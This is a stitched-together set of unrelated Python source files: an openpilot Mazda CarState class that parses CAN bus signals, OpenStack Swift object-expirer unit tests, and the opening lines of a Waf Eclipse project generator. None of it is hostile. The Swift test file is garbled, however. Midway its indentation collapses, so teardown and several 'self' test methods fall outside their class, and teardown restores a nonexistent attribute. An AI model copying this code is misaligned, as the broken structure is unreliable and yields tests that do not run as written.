    assert fixed_a != limited_a
    assert bound_a != greedy_a
    assert greedy_a != limited_a
|
|
from cereal import car
from selfdrive.config import Conversions as CV
from opendbc.can.can_define import CANDefine
from opendbc.can.parser import CANParser
from selfdrive.car.interfaces import CarStateBase
from selfdrive.car.mazda.values import DBC, LKAS_LIMITS, GEN1
class CarState(CarStateBase):
  """Parses Mazda CAN traffic into a cereal CarState message.

  `update` is called once per cycle with the powertrain parser (`cp`) and
  the camera parser (`cp_cam`); the static `get_*_parser` methods build
  those parsers from the car's DBC definition.
  """
  def __init__(self, CP):
    super().__init__(CP)
    can_define = CANDefine(DBC[CP.carFingerprint]["pt"])
    # Mapping from raw GEAR signal values to gear names, taken from the DBC.
    self.shifter_values = can_define.dv["GEAR"]["GEAR"]
    # Latest cruise-button message counter observed on the bus.
    self.crz_btns_counter = 0
    # Cruise state from the previous update; used for the low-speed alert.
    self.acc_active_last = False
    self.low_speed_alert = False
    # True once the car has been fast enough for LKAS (with hysteresis).
    self.lkas_allowed_speed = False
    # True when the camera reports lane lines off (driver disabled LKAS).
    self.lkas_disabled = False
  def update(self, cp, cp_cam):
    """Build and return a CarState message from the latest CAN values."""
    ret = car.CarState.new_message()
    ret.wheelSpeeds = self.get_wheel_speeds(
      cp.vl["WHEEL_SPEEDS"]["FL"],
      cp.vl["WHEEL_SPEEDS"]["FR"],
      cp.vl["WHEEL_SPEEDS"]["RL"],
      cp.vl["WHEEL_SPEEDS"]["RR"],
    )
    # Simple mean of the four wheel speeds, then Kalman-filtered.
    ret.vEgoRaw = (ret.wheelSpeeds.fl + ret.wheelSpeeds.fr + ret.wheelSpeeds.rl + ret.wheelSpeeds.rr) / 4.
    ret.vEgo, ret.aEgo = self.update_speed_kf(ret.vEgoRaw)
    # Match panda speed reading
    speed_kph = cp.vl["ENGINE_DATA"]["SPEED"]
    ret.standstill = speed_kph < .1
    can_gear = int(cp.vl["GEAR"]["GEAR"])
    ret.gearShifter = self.parse_gear_shifter(self.shifter_values.get(can_gear, None))
    ret.genericToggle = bool(cp.vl["BLINK_INFO"]["HIGH_BEAMS"])
    ret.leftBlindspot = cp.vl["BSM"]["LEFT_BS1"] == 1
    ret.rightBlindspot = cp.vl["BSM"]["RIGHT_BS1"] == 1
    # 40 is the blinker-lamp debounce parameter of the base-class helper --
    # see CarStateBase.update_blinker_from_lamp; TODO confirm units (frames).
    ret.leftBlinker, ret.rightBlinker = self.update_blinker_from_lamp(40, cp.vl["BLINK_INFO"]["LEFT_BLINK"] == 1,
                                                                      cp.vl["BLINK_INFO"]["RIGHT_BLINK"] == 1)
    ret.steeringAngleDeg = cp.vl["STEER"]["STEER_ANGLE"]
    # Driver torque; beyond STEER_THRESHOLD the driver is considered to be
    # actively steering.
    ret.steeringTorque = cp.vl["STEER_TORQUE"]["STEER_TORQUE_SENSOR"]
    ret.steeringPressed = abs(ret.steeringTorque) > LKAS_LIMITS.STEER_THRESHOLD
    ret.steeringTorqueEps = cp.vl["STEER_TORQUE"]["STEER_TORQUE_MOTOR"]
    ret.steeringRateDeg = cp.vl["STEER_RATE"]["STEER_ANGLE_RATE"]
    # TODO: this should be from 0 - 1.
    ret.brakePressed = cp.vl["PEDALS"]["BRAKE_ON"] == 1
    ret.brake = cp.vl["BRAKE"]["BRAKE_PRESSURE"]
    ret.seatbeltUnlatched = cp.vl["SEATBELT"]["DRIVER_SEATBELT"] == 0
    ret.doorOpen = any([cp.vl["DOORS"]["FL"], cp.vl["DOORS"]["FR"],
                        cp.vl["DOORS"]["BL"], cp.vl["DOORS"]["BR"]])
    # TODO: this should be from 0 - 1.
    ret.gas = cp.vl["ENGINE_DATA"]["PEDAL_GAS"]
    ret.gasPressed = ret.gas > 0
    # Either due to low speed or hands off
    lkas_blocked = cp.vl["STEER_RATE"]["LKAS_BLOCK"] == 1
    if self.CP.minSteerSpeed > 0:
      # LKAS is enabled at 52kph going up and disabled at 45kph going down
      # wait for LKAS_BLOCK signal to clear when going up since it lags behind the speed sometimes
      if speed_kph > LKAS_LIMITS.ENABLE_SPEED and not lkas_blocked:
        self.lkas_allowed_speed = True
      elif speed_kph < LKAS_LIMITS.DISABLE_SPEED:
        self.lkas_allowed_speed = False
    # TODO: the signal used for available seems to be the adaptive cruise signal, instead of the main on
    # it should be used for carState.cruiseState.nonAdaptive instead
    ret.cruiseState.available = cp.vl["CRZ_CTRL"]["CRZ_AVAILABLE"] == 1
    ret.cruiseState.enabled = cp.vl["CRZ_CTRL"]["CRZ_ACTIVE"] == 1
    ret.cruiseState.speed = cp.vl["CRZ_EVENTS"]["CRZ_SPEED"] * CV.KPH_TO_MS
    # Warn when cruise engages below the LKAS-capable speed.
    if ret.cruiseState.enabled:
      if not self.lkas_allowed_speed and self.acc_active_last:
        self.low_speed_alert = True
      else:
        self.low_speed_alert = False
    # Check if LKAS is disabled due to lack of driver torque when all other states indicate
    # it should be enabled (steer lockout). Don't warn until we actually get lkas active
    # and lose it again, i.e, after initial lkas activation
    ret.steerFaultTemporary = self.lkas_allowed_speed and lkas_blocked
    self.acc_active_last = ret.cruiseState.enabled
    self.crz_btns_counter = cp.vl["CRZ_BTNS"]["CTR"]
    # camera signals
    self.lkas_disabled = cp_cam.vl["CAM_LANEINFO"]["LANE_LINES"] == 0
    # Raw camera frames kept for the car controller to forward/modify.
    self.cam_lkas = cp_cam.vl["CAM_LKAS"]
    self.cam_laneinfo = cp_cam.vl["CAM_LANEINFO"]
    ret.steerFaultPermanent = cp_cam.vl["CAM_LKAS"]["ERR_BIT_1"] == 1
    return ret
  @staticmethod
  def get_can_parser(CP):
    """Return the CAN parser for the powertrain bus (bus 0)."""
    signals = [
      # sig_name, sig_address
      ("LEFT_BLINK", "BLINK_INFO"),
      ("RIGHT_BLINK", "BLINK_INFO"),
      ("HIGH_BEAMS", "BLINK_INFO"),
      ("STEER_ANGLE", "STEER"),
      ("STEER_ANGLE_RATE", "STEER_RATE"),
      ("STEER_TORQUE_SENSOR", "STEER_TORQUE"),
      ("STEER_TORQUE_MOTOR", "STEER_TORQUE"),
      ("FL", "WHEEL_SPEEDS"),
      ("FR", "WHEEL_SPEEDS"),
      ("RL", "WHEEL_SPEEDS"),
      ("RR", "WHEEL_SPEEDS"),
    ]
    checks = [
      # sig_address, frequency
      ("BLINK_INFO", 10),
      ("STEER", 67),
      ("STEER_RATE", 83),
      ("STEER_TORQUE", 83),
      ("WHEEL_SPEEDS", 100),
    ]
    # First-generation cars carry the full cruise/pedal/door signal set.
    if CP.carFingerprint in GEN1:
      signals += [
        ("LKAS_BLOCK", "STEER_RATE"),
        ("LKAS_TRACK_STATE", "STEER_RATE"),
        ("HANDS_OFF_5_SECONDS", "STEER_RATE"),
        ("CRZ_ACTIVE", "CRZ_CTRL"),
        ("CRZ_AVAILABLE", "CRZ_CTRL"),
        ("CRZ_SPEED", "CRZ_EVENTS"),
        ("STANDSTILL", "PEDALS"),
        ("BRAKE_ON", "PEDALS"),
        ("BRAKE_PRESSURE", "BRAKE"),
        ("GEAR", "GEAR"),
        ("DRIVER_SEATBELT", "SEATBELT"),
        ("FL", "DOORS"),
        ("FR", "DOORS"),
        ("BL", "DOORS"),
        ("BR", "DOORS"),
        ("PEDAL_GAS", "ENGINE_DATA"),
        ("SPEED", "ENGINE_DATA"),
        ("CTR", "CRZ_BTNS"),
        ("LEFT_BS1", "BSM"),
        ("RIGHT_BS1", "BSM"),
      ]
      checks += [
        ("ENGINE_DATA", 100),
        ("CRZ_CTRL", 50),
        ("CRZ_EVENTS", 50),
        ("CRZ_BTNS", 10),
        ("PEDALS", 50),
        ("BRAKE", 50),
        ("SEATBELT", 10),
        ("DOORS", 10),
        ("GEAR", 20),
        ("BSM", 10),
      ]
    return CANParser(DBC[CP.carFingerprint]["pt"], signals, checks, 0)
  @staticmethod
  def get_cam_can_parser(CP):
    """Return the CAN parser for the camera bus (bus 2)."""
    signals = []
    checks = []
    if CP.carFingerprint in GEN1:
      signals += [
        # sig_name, sig_address
        ("LKAS_REQUEST", "CAM_LKAS"),
        ("CTR", "CAM_LKAS"),
        ("ERR_BIT_1", "CAM_LKAS"),
        ("LINE_NOT_VISIBLE", "CAM_LKAS"),
        ("BIT_1", "CAM_LKAS"),
        ("ERR_BIT_2", "CAM_LKAS"),
        ("STEERING_ANGLE", "CAM_LKAS"),
        ("ANGLE_ENABLED", "CAM_LKAS"),
        ("CHKSUM", "CAM_LKAS"),
        ("LINE_VISIBLE", "CAM_LANEINFO"),
        ("LINE_NOT_VISIBLE", "CAM_LANEINFO"),
        ("LANE_LINES", "CAM_LANEINFO"),
        ("BIT1", "CAM_LANEINFO"),
        ("BIT2", "CAM_LANEINFO"),
        ("BIT3", "CAM_LANEINFO"),
        ("NO_ERR_BIT", "CAM_LANEINFO"),
        ("S1", "CAM_LANEINFO"),
        ("S1_HBEAM", "CAM_LANEINFO"),
      ]
      checks += [
        # sig_address, frequency
        ("CAM_LANEINFO", 2),
        ("CAM_LKAS", 16),
      ]
    return CANParser(DBC[CP.carFingerprint]["pt"], signals, checks, 2)
|
|
# Copyright (c) 2011 OpenStack, LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import urllib
from time import time
from unittest import main, TestCase
from test.unit import FakeLogger
from copy import deepcopy
import mock
from swift.common import internal_client
from swift.obj import expirer
def not_random():
    """Deterministic stand-in for random(): always returns 0.5."""
    return 0.5


# Duration passed to the most recent not_sleep() call.
last_not_sleep = 0


def not_sleep(seconds):
    """Stand-in for sleep() that records the request instead of waiting."""
    global last_not_sleep
    last_not_sleep = seconds
class TestObjectExpirer(TestCase):
    # Show full diffs on assertEqual failures.
    maxDiff = None
    def setUp(self):
        """Patch internal_client's loadapp/sleep with test doubles."""
        # NOTE(review): `global not_sleep` is unnecessary here -- the name is
        # only read, never rebound.
        global not_sleep
        # Save the real hooks so they can be restored after the test.
        self.old_loadapp = internal_client.loadapp
        self.old_sleep = internal_client.sleep
        internal_client.loadapp = lambda x: None
        internal_client.sleep = not_sleep
def teardown(self):
internal_client.sleep = self.old_sleep
internal_client.loadapp = self.loadapp
def test_get_process_values_from_kwargs(self):
x = expirer.ObjectExpirer({})
vals = {
'processes': 5,
'process': 1,
}
self.assertEqual((5, 1), x.get_process_values(vals))
def test_get_process_values_from_config(self):
vals = {
'processes': 5,
'process': 1,
}
x = expirer.ObjectExpirer(vals)
self.assertEqual((5, 1), x.get_process_values({}))
def test_get_process_values_negative_process(self):
vals = {
'processes': 5,
'process': -1,
}
# from config
x = expirer.ObjectExpirer(vals)
self.assertRaises(ValueError, x.get_process_values, {})
# from kwargs
x = expirer.ObjectExpirer({})
self.assertRaises(ValueError, x.get_process_values, vals)
def test_get_process_values_negative_processes(self):
vals = {
'processes': -5,
'process': 1,
}
# from config
x = expirer.ObjectExpirer(vals)
self.assertRaises(ValueError, x.get_process_values, {})
# from kwargs
x = expirer.ObjectExpirer({})
self.assertRaises(ValueError, x.get_process_values, vals)
def test_get_process_values_process_greater_than_processes(self):
vals = {
'processes': 5,
'process': 7,
}
# from config
x = expirer.ObjectExpirer(vals)
self.assertRaises(ValueError, x.get_process_values, {})
# from kwargs
x = expirer.ObjectExpirer({})
self.assertRaises(ValueError, x.get_process_values, vals)
def test_init_concurrency_too_small(self):
conf = {
'concurrency': 0,
}
self.assertRaises(ValueError, expirer.ObjectExpirer, conf)
conf = {
'concurrency': -1,
}
self.assertRaises(ValueError, expirer.ObjectExpirer, conf)
    def test_process_based_concurrency(self):
        """Three processes together delete every object exactly once.

        Each pass with a different `process` index must delete a disjoint,
        non-empty share; the union over all indexes equals all objects.
        """
        # Expirer subclass that records deletions instead of performing them.
        class ObjectExpirer(expirer.ObjectExpirer):
            def __init__(self, conf):
                super(ObjectExpirer, self).__init__(conf)
                self.processes = 3
                self.deleted_objects = {}
            def delete_object(self, actual_obj, timestamp, container, obj):
                if not container in self.deleted_objects:
                    self.deleted_objects[container] = set()
                self.deleted_objects[container].add(obj)
        # Minimal fake of the swift internal client backed by a dict.
        class InternalClient(object):
            def __init__(self, containers):
                self.containers = containers
            def get_account_info(self, *a, **kw):
                return len(self.containers.keys()), \
                    sum([len(self.containers[x]) for x in self.containers])
            def iter_containers(self, *a, **kw):
                return [{'name': x} for x in self.containers.keys()]
            def iter_objects(self, account, container):
                return [{'name': x} for x in self.containers[container]]
            def delete_container(*a, **kw):
                pass
        containers = {
            0: set('1-one 2-two 3-three'.split()),
            1: set('2-two 3-three 4-four'.split()),
            2: set('5-five 6-six'.split()),
            3: set('7-seven'.split()),
        }
        x = ObjectExpirer({})
        x.swift = InternalClient(containers)
        deleted_objects = {}
        for i in xrange(0, 3):
            x.process = i
            x.run_once()
            # Every process index must contribute something new.
            self.assertNotEqual(deleted_objects, x.deleted_objects)
            deleted_objects = deepcopy(x.deleted_objects)
        self.assertEqual(containers, deleted_objects)
    def test_delete_object(self):
        """delete_object removes the actual object, then its queue entry."""
        # Fake internal client asserting delete_object gets the queue entry.
        class InternalClient(object):
            def __init__(self, test, account, container, obj):
                self.test = test
                self.account = account
                self.container = container
                self.obj = obj
                self.delete_object_called = False
            def delete_object(self, account, container, obj):
                self.test.assertEqual(self.account, account)
                self.test.assertEqual(self.container, container)
                self.test.assertEqual(self.obj, obj)
                self.delete_object_called = True
        # Callable double asserting delete_actual_object gets the real object.
        class DeleteActualObject(object):
            def __init__(self, test, actual_obj, timestamp):
                self.test = test
                self.actual_obj = actual_obj
                self.timestamp = timestamp
                self.called = False
            def __call__(self, actual_obj, timestamp):
                self.test.assertEqual(self.actual_obj, actual_obj)
                self.test.assertEqual(self.timestamp, timestamp)
                self.called = True
        container = 'container'
        obj = 'obj'
        actual_obj = 'actual_obj'
        timestamp = 'timestamp'
        x = expirer.ObjectExpirer({})
        x.logger = FakeLogger()
        x.swift = \
            InternalClient(self, x.expiring_objects_account, container, obj)
        x.delete_actual_object = \
            DeleteActualObject(self, actual_obj, timestamp)
        x.delete_object(actual_obj, timestamp, container, obj)
        self.assertTrue(x.swift.delete_object_called)
        self.assertTrue(x.delete_actual_object.called)
    def test_report(self):
        """report() is quiet normally, 'completed' when final, 'so far' when
        the report interval has elapsed."""
        x = expirer.ObjectExpirer({})
        x.logger = FakeLogger()
        # Fresh expirer, interval not elapsed: nothing logged.
        x.report()
        self.assertEqual(x.logger.log_dict['info'], [])
        x.logger._clear()
        # Final report: logs 'completed', never 'so far'.
        x.report(final=True)
        self.assertTrue('completed' in x.logger.log_dict['info'][-1][0][0],
                        x.logger.log_dict['info'])
        self.assertTrue('so far' not in x.logger.log_dict['info'][-1][0][0],
                        x.logger.log_dict['info'])
        x.logger._clear()
        # Interval elapsed: logs a 'so far' progress line instead.
        x.report_last_time = time() - x.report_interval
        x.report()
        self.assertTrue('completed' not in x.logger.log_dict['info'][-1][0][0],
                        x.logger.log_dict['info'])
        self.assertTrue('so far' in x.logger.log_dict['info'][-1][0][0],
                        x.logger.log_dict['info'])
    def test_run_once_nothing_to_do(self):
        """run_once logs (not raises) when the swift client is unusable."""
        x = expirer.ObjectExpirer({})
        x.logger = FakeLogger()
        # A str has none of the client methods, so the first call fails.
        x.swift = 'throw error because a string does not have needed methods'
        x.run_once()
        self.assertEqual(x.logger.log_dict['exception'],
                         [(("Unhandled exception",), {},
                           "'str' object has no attribute "
                           "'get_account_info'")])
    def test_run_once_calls_report(self):
        """A pass over an empty account logs the begin and completed lines."""
        # Fake client reporting 1 container / 2 objects but yielding none.
        class InternalClient(object):
            def get_account_info(*a, **kw):
                return 1, 2
            def iter_containers(*a, **kw):
                return []
        x = expirer.ObjectExpirer({})
        x.logger = FakeLogger()
        x.swift = InternalClient()
        x.run_once()
        self.assertEqual(
            x.logger.log_dict['info'],
            [(('Pass beginning; 1 possible containers; '
               '2 possible objects',), {}),
             (('Pass completed in 0s; 0 objects expired',), {})])
    def test_container_timestamp_break(self):
        """Containers whose name (a timestamp) is in the future are skipped
        without ever listing their objects."""
        class InternalClient(object):
            def __init__(self, containers):
                self.containers = containers
            def get_account_info(*a, **kw):
                return 1, 2
            def iter_containers(self, *a, **kw):
                return self.containers
            # Would only be reached if the future container were processed.
            def iter_objects(*a, **kw):
                raise Exception('This should not have been called')
        x = expirer.ObjectExpirer({})
        x.logger = FakeLogger()
        # Container timestamp one day in the future: must be skipped.
        x.swift = InternalClient([{'name': str(int(time() + 86400))}])
        x.run_once()
        for exccall in x.logger.log_dict['exception']:
            self.assertTrue(
                'This should not have been called' not in exccall[0][0])
        self.assertEqual(
            x.logger.log_dict['info'],
            [(('Pass beginning; 1 possible containers; '
               '2 possible objects',), {}),
             (('Pass completed in 0s; 0 objects expired',), {})])
        # Reverse test to be sure it still would blow up the way expected.
        x = expirer.ObjectExpirer({})
        x.logger = FakeLogger()
        x.swift = InternalClient([{'name': str(int(time() - 86400))}])
        x.run_once()
        self.assertEqual(x.logger.log_dict['exception'],
                         [(('Unhandled exception',), {},
                           str(Exception('This should not have been called')))])
    def test_object_timestamp_break(self):
        """Objects whose name-prefix timestamp is in the future are skipped;
        past-dated objects are actually handed to delete_actual_object."""
        class InternalClient(object):
            def __init__(self, containers, objects):
                self.containers = containers
                self.objects = objects
            def get_account_info(*a, **kw):
                return 1, 2
            def iter_containers(self, *a, **kw):
                return self.containers
            def delete_container(*a, **kw):
                pass
            def iter_objects(self, *a, **kw):
                return self.objects
        # Sentinel for delete_actual_object in the skip case.
        def should_not_be_called(*a, **kw):
            raise Exception('This should not have been called')
        x = expirer.ObjectExpirer({})
        x.logger = FakeLogger()
        # Past container, future object: the object must be skipped.
        x.swift = InternalClient([{'name': str(int(time() - 86400))}],
                                 [{'name': '%d-actual-obj' % int(time() + 86400)}])
        x.run_once()
        for exccall in x.logger.log_dict['exception']:
            self.assertTrue(
                'This should not have been called' not in exccall[0][0])
        self.assertEqual(x.logger.log_dict['info'],
                         [(('Pass beginning; 1 possible containers; '
                            '2 possible objects',), {}),
                          (('Pass completed in 0s; 0 objects expired',), {})])
        # Reverse test to be sure it still would blow up the way expected.
        x = expirer.ObjectExpirer({})
        x.logger = FakeLogger()
        ts = int(time() - 86400)
        x.swift = InternalClient([{'name': str(int(time() - 86400))}],
                                 [{'name': '%d-actual-obj' % ts}])
        x.delete_actual_object = should_not_be_called
        x.run_once()
        excswhiledeleting = []
        for exccall in x.logger.log_dict['exception']:
            if exccall[0][0].startswith('Exception while deleting '):
                excswhiledeleting.append(exccall[0][0])
        self.assertEqual(excswhiledeleting,
                         ['Exception while deleting object %d %d-actual-obj '
                          'This should not have been called' % (ts, ts)])
    def test_failed_delete_keeps_entry(self):
        """When deleting the actual object fails, the queue entry is kept
        (swift.delete_object is never reached) and the error is logged."""
        class InternalClient(object):
            def __init__(self, containers, objects):
                self.containers = containers
                self.objects = objects
            def get_account_info(*a, **kw):
                return 1, 2
            def iter_containers(self, *a, **kw):
                return self.containers
            def delete_container(*a, **kw):
                pass
            # Queue-entry removal must not happen after a failed delete.
            def delete_object(*a, **kw):
                raise Exception('This should not have been called')
            def iter_objects(self, *a, **kw):
                return self.objects
        # Simulates the actual-object deletion failing.
        def deliberately_blow_up(actual_obj, timestamp):
            raise Exception('failed to delete actual object')
        def should_not_get_called(container, obj):
            raise Exception('This should not have been called')
        x = expirer.ObjectExpirer({})
        x.logger = FakeLogger()
        x.iter_containers = lambda: [str(int(time() - 86400))]
        ts = int(time() - 86400)
        x.delete_actual_object = deliberately_blow_up
        x.swift = InternalClient([{'name': str(int(time() - 86400))}],
                                 [{'name': '%d-actual-obj' % ts}])
        x.run_once()
        excswhiledeleting = []
        for exccall in x.logger.log_dict['exception']:
            if exccall[0][0].startswith('Exception while deleting '):
                excswhiledeleting.append(exccall[0][0])
        self.assertEqual(excswhiledeleting,
                         ['Exception while deleting object %d %d-actual-obj '
                          'failed to delete actual object' % (ts, ts)])
        self.assertEqual(x.logger.log_dict['info'],
                         [(('Pass beginning; 1 possible containers; '
                            '2 possible objects',), {}),
                          (('Pass completed in 0s; 0 objects expired',), {})])
        # Reverse test to be sure it still would blow up the way expected.
        x = expirer.ObjectExpirer({})
        x.logger = FakeLogger()
        ts = int(time() - 86400)
        # Actual delete succeeds, so the queue-entry delete is attempted
        # and hits the raising fake above.
        x.delete_actual_object = lambda o, t: None
        x.swift = InternalClient([{'name': str(int(time() - 86400))}],
                                 [{'name': '%d-actual-obj' % ts}])
        x.run_once()
        excswhiledeleting = []
        for exccall in x.logger.log_dict['exception']:
            if exccall[0][0].startswith('Exception while deleting '):
                excswhiledeleting.append(exccall[0][0])
        self.assertEqual(excswhiledeleting,
                         ['Exception while deleting object %d %d-actual-obj This should '
                          'not have been called' % (ts, ts)])
    def test_success_gets_counted(self):
        """A successful expiration increments report_objects and is logged."""
        class InternalClient(object):
            def __init__(self, containers, objects):
                self.containers = containers
                self.objects = objects
            def get_account_info(*a, **kw):
                return 1, 2
            def iter_containers(self, *a, **kw):
                return self.containers
            def delete_container(*a, **kw):
                pass
            def delete_object(*a, **kw):
                pass
            def iter_objects(self, *a, **kw):
                return self.objects
        x = expirer.ObjectExpirer({})
        x.logger = FakeLogger()
        # No-op actual delete: the pass succeeds for the one object.
        x.delete_actual_object = lambda o, t: None
        self.assertEqual(x.report_objects, 0)
        x.swift = InternalClient([{'name': str(int(time() - 86400))}],
                                 [{'name': '%d-actual-obj' % int(time() - 86400)}])
        x.run_once()
        self.assertEqual(x.report_objects, 1)
        self.assertEqual(x.logger.log_dict['info'],
                         [(('Pass beginning; 1 possible containers; '
                            '2 possible objects',), {}),
                          (('Pass completed in 0s; 1 objects expired',), {})])
    def test_delete_actual_object_does_not_get_unicode(self):
        """Object names are passed to delete_actual_object as str, never
        unicode, even when the listing yields unicode names."""
        class InternalClient(object):
            def __init__(self, containers, objects):
                self.containers = containers
                self.objects = objects
            def get_account_info(*a, **kw):
                return 1, 2
            def iter_containers(self, *a, **kw):
                return self.containers
            def delete_container(*a, **kw):
                pass
            def delete_object(*a, **kw):
                pass
            def iter_objects(self, *a, **kw):
                return self.objects
        # Mutable cell so the probe below can record what it saw.
        got_unicode = [False]
        def delete_actual_object_test_for_unicode(actual_obj, timestamp):
            if isinstance(actual_obj, unicode):
                got_unicode[0] = True
        x = expirer.ObjectExpirer({})
        x.logger = FakeLogger()
        x.delete_actual_object = delete_actual_object_test_for_unicode
        self.assertEqual(x.report_objects, 0)
        # The object name is deliberately a unicode literal.
        x.swift = InternalClient([{'name': str(int(time() - 86400))}],
                                 [{'name': u'%d-actual-obj' % int(time() - 86400)}])
        x.run_once()
        self.assertEqual(x.report_objects, 1)
        self.assertEqual(x.logger.log_dict['info'],
                         [(('Pass beginning; 1 possible containers; '
                            '2 possible objects',), {}),
                          (('Pass completed in 0s; 1 objects expired',), {})])
        self.assertFalse(got_unicode[0])
    def test_failed_delete_continues_on(self):
        """Failures deleting objects or containers are logged and the pass
        continues through every remaining container and object."""
        class InternalClient(object):
            def __init__(self, containers, objects):
                self.containers = containers
                self.objects = objects
            def get_account_info(*a, **kw):
                return 1, 2
            def iter_containers(self, *a, **kw):
                return self.containers
            def delete_container(*a, **kw):
                raise Exception('failed to delete container')
            def delete_object(*a, **kw):
                pass
            def iter_objects(self, *a, **kw):
                return self.objects
        def fail_delete_actual_object(actual_obj, timestamp):
            raise Exception('failed to delete actual object')
        x = expirer.ObjectExpirer({})
        x.logger = FakeLogger()
        # Two past-dated containers, each listing the same two objects.
        cts = int(time() - 86400)
        ots = int(time() - 86400)
        containers = [
            {'name': str(cts)},
            {'name': str(cts + 1)},
        ]
        objects = [
            {'name': '%d-actual-obj' % ots},
            {'name': '%d-next-obj' % ots}
        ]
        x.swift = InternalClient(containers, objects)
        x.delete_actual_object = fail_delete_actual_object
        x.run_once()
        excswhiledeleting = []
        for exccall in x.logger.log_dict['exception']:
            if exccall[0][0].startswith('Exception while deleting '):
                excswhiledeleting.append(exccall[0][0])
        # Every object in every container, plus both containers, must have
        # produced its own logged failure: nothing stopped the pass early.
        self.assertEqual(sorted(excswhiledeleting), sorted([
            'Exception while deleting object %d %d-actual-obj failed to '
            'delete actual object' % (cts, ots),
            'Exception while deleting object %d %d-next-obj failed to '
            'delete actual object' % (cts, ots),
            'Exception while deleting object %d %d-actual-obj failed to '
            'delete actual object' % (cts + 1, ots),
            'Exception while deleting object %d %d-next-obj failed to '
            'delete actual object' % (cts + 1, ots),
            'Exception while deleting container %d failed to delete '
            'container' % (cts,),
            'Exception while deleting container %d failed to delete '
            'container' % (cts + 1,)]))
        self.assertEqual(x.logger.log_dict['info'],
                         [(('Pass beginning; 1 possible containers; '
                            '2 possible objects',), {}),
                          (('Pass completed in 0s; 0 objects expired',), {})])
def test_run_forever_initial_sleep_random(self):
    """run_forever() must first sleep a random fraction of the interval."""
    global last_not_sleep

    def raise_system_exit():
        raise SystemExit('test_run_forever')

    interval = 1234
    x = expirer.ObjectExpirer({'__file__': 'unit_test',
                               'interval': interval})
    orig_random = expirer.random
    orig_sleep = expirer.sleep
    try:
        # not_random/not_sleep are module-level test doubles; not_sleep
        # records its argument in last_not_sleep. run_once raises to
        # break out of the forever-loop after the initial sleep.
        expirer.random = not_random
        expirer.sleep = not_sleep
        x.run_once = raise_system_exit
        x.run_forever()
    except SystemExit, err:
        pass
    finally:
        expirer.random = orig_random
        expirer.sleep = orig_sleep
    self.assertEqual(str(err), 'test_run_forever')
    # Initial sleep should be random() * interval = 0.5 * 1234.
    self.assertEqual(last_not_sleep, 0.5 * interval)
def test_run_forever_catches_usual_exceptions(self):
    """run_forever() logs and survives ordinary exceptions but lets
    SystemExit propagate."""
    raises = [0]

    def raise_exceptions():
        # First call raises a plain Exception (should be caught and
        # logged); second raises SystemExit (should escape the loop).
        raises[0] += 1
        if raises[0] < 2:
            raise Exception('exception %d' % raises[0])
        raise SystemExit('exiting exception %d' % raises[0])

    x = expirer.ObjectExpirer({})
    x.logger = FakeLogger()
    orig_sleep = expirer.sleep
    try:
        expirer.sleep = not_sleep
        x.run_once = raise_exceptions
        x.run_forever()
    except SystemExit, err:
        pass
    finally:
        expirer.sleep = orig_sleep
    self.assertEqual(str(err), 'exiting exception 2')
    # Only the first (ordinary) exception was logged.
    self.assertEqual(x.logger.log_dict['exception'],
                     [(('Unhandled exception',), {},
                       'exception 1')])
def test_delete_actual_object(self):
    """delete_actual_object must send the timestamp as X-If-Delete-At."""
    captured = {}

    def fake_app(env, start_response):
        captured['env'] = env
        start_response('204 No Content', [('Content-Length', '0')])
        return []

    internal_client.loadapp = lambda x: fake_app
    expirer_obj = expirer.ObjectExpirer({})
    timestamp = '1234'
    expirer_obj.delete_actual_object('/path/to/object', timestamp)
    self.assertEqual(captured['env']['HTTP_X_IF_DELETE_AT'], timestamp)
def test_delete_actual_object_nourlquoting(self):
    # delete_actual_object should not do its own url quoting because
    # internal client's make_request handles that.
    got_env = [None]

    def fake_app(env, start_response):
        got_env[0] = env
        start_response('204 No Content', [('Content-Length', '0')])
        return []

    internal_client.loadapp = lambda x: fake_app
    x = expirer.ObjectExpirer({})
    ts = '1234'
    x.delete_actual_object('/path/to/object name', ts)
    self.assertEqual(got_env[0]['HTTP_X_IF_DELETE_AT'], ts)
    # The literal space survived: no quoting was applied here.
    self.assertEqual(got_env[0]['PATH_INFO'], '/v1/path/to/object name')
def test_delete_actual_object_handles_404(self):
    """A 404 response from the backend must not raise."""
    def fake_app(env, start_response):
        start_response('404 Not Found', [('Content-Length', '0')])
        return []

    internal_client.loadapp = lambda x: fake_app
    expirer_obj = expirer.ObjectExpirer({})
    expirer_obj.delete_actual_object('/path/to/object', '1234')
def test_delete_actual_object_handles_412(self):
    """A 412 Precondition Failed response must not raise."""
    def fake_app(env, start_response):
        start_response('412 Precondition Failed',
                       [('Content-Length', '0')])
        return []

    internal_client.loadapp = lambda x: fake_app
    x = expirer.ObjectExpirer({})
    x.delete_actual_object('/path/to/object', '1234')
def test_delete_actual_object_does_not_handle_odd_stuff(self):
    """Unexpected statuses (e.g. 503) must propagate to the caller.

    Unlike 404/412, a 5xx response is re-raised so the expired entry
    can be retried on a later pass.
    """
    def fake_app(env, start_response):
        # Fix: 503's standard reason phrase is 'Service Unavailable';
        # the original said 'Internal Server Error', which is 500.
        start_response('503 Service Unavailable',
                       [('Content-Length', '0')])
        return []

    internal_client.loadapp = lambda x: fake_app
    x = expirer.ObjectExpirer({})
    exc = None
    try:
        x.delete_actual_object('/path/to/object', '1234')
    except Exception as err:
        exc = err
    # Fail with a clear message if nothing was raised at all, instead
    # of an AttributeError on None below.
    self.assertTrue(exc is not None)
    self.assertEqual(503, exc.resp.status_int)
def test_delete_actual_object_quotes(self):
    """The object name must be url-quoted in the request path."""
    name = 'this name should get quoted'
    timestamp = '1366063156.863045'
    x = expirer.ObjectExpirer({})
    x.swift.make_request = mock.MagicMock()
    x.delete_actual_object(name, timestamp)
    x.swift.make_request.assert_called_once()
    # Second positional arg of make_request is the request path.
    self.assertEqual(x.swift.make_request.call_args[0][1],
                     '/v1/' + urllib.quote(name))
# Allow running this test module directly.
if __name__ == '__main__':
    main()
|
|
#! /usr/bin/env python
# encoding: utf-8
# Eclipse CDT 5.0 generator for Waf
# Richard Quirk 2009-1011 (New BSD License)
# Thomas Nagy 2011 (ported to Waf 1.6)
"""
Usage:
def options(opt):
opt.load('eclipse')
$ waf configure eclipse
"""
import sys, os
from waflib import Utils, Logs, Context, Build, TaskGen, Scripting, Errors, Node
